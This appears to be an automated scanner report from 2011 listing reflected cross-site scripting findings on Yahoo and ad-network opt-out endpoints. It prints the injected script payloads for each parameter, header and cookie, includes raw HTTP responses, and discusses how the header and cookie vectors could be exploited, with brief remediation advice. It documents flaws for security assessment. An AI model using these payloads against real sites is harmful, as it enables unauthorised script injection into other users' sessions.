This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 43e9c'><script>alert(1)</script>ff1ecc33843 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f991'><script>alert(1)</script>9ca8bd1e85c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89e0b'><script>alert(1)</script>6fe96d9d237 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fcb73'><script>alert(1)</script>b562a0271e6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18913'><script>alert(1)</script>4acb06cacbc was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the yahoo_token request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3056d'><script>alert(1)</script>2b737e48203 was submitted in the yahoo_token parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c255d<script>alert(1)</script>220945ec9e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aef8b'><script>alert(1)</script>d11220e980e25158f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cf3d0'><script>alert(1)</script>94fcdc6d737 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the token_nai_ad_us-ec_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 22625'><script>alert(1)</script>8ee1384bf2b was submitted in the token_nai_ad_us-ec_adtechus_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_adserver_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90aef'><script>alert(1)</script>7f938b6c10c was submitted in the token_nai_adserver_adtechus_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_adserverec_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 58e9d'><script>alert(1)</script>55519e151d6 was submitted in the token_nai_adserverec_adtechus_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_adserverwc_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e74eb'><script>alert(1)</script>9368fe8ee1f was submitted in the token_nai_adserverwc_adtechus_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_adsonar_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e7c39'><script>alert(1)</script>978d1a01cba was submitted in the token_nai_adsonar_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_adtech_de cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f0c9'><script>alert(1)</script>0b058d3c65a was submitted in the token_nai_adtech_de cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_advertising_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d36a0'><script>alert(1)</script>910f4583b26 was submitted in the token_nai_advertising_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_glb_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload faec3'><script>alert(1)</script>f9eef7d7b6d was submitted in the token_nai_glb_adtechus_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_tacoda_at_atwola_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 458ed'><script>alert(1)</script>848fa3d6f75 was submitted in the token_nai_tacoda_at_atwola_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 66407<script>alert(1)</script>6bc6c94bbf4 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Found Date: Wed, 07 Sep 2011 12:46:10 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: XO=y=1&t=249&v=3&yoo=0&nwid1=20072115599&XTS=1315399570&XSIG=RW_abL1q00XwoSCpYC7LCgnuejk-;path=/; expires=Tue, 07-Sep-2013 20:00:00 GMT;domain=.yieldmanager.net Location: http://info.yahoo.com/nai/nai-verify.html?optoutverify=true66407<script>alert(1)</script>6bc6c94bbf4 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=utf-8 Cache-Control: private Content-Length: 877
HTTP/1.1 302 Found Date: Wed, 07 Sep 2011 12:46:10 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Location: http://info.yahoo.com/nai/nai-verify.html?optoutverify=true66407<script>alert(1)</script>6bc6c94bbf4 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Cache-Control: private
The document has moved <A HREF="http://info.yahoo.com/nai/nai-v ...[SNIP]...
The value of the BIZO cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63c73"><script>alert(1)</script>d9aa13736f9 was submitted in the BIZO cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the BIZO cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e43f7'-alert(1)-'6af2bcfd4a9 was submitted in the BIZO cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rsi_csl cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ace8"><script>alert(1)</script>03186c8d848 was submitted in the rsi_csl cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the rsi_csl cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4275'%3balert(1)//7b22ce69683 was submitted in the rsi_csl cookie. This input was echoed as b4275';alert(1)//7b22ce69683 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.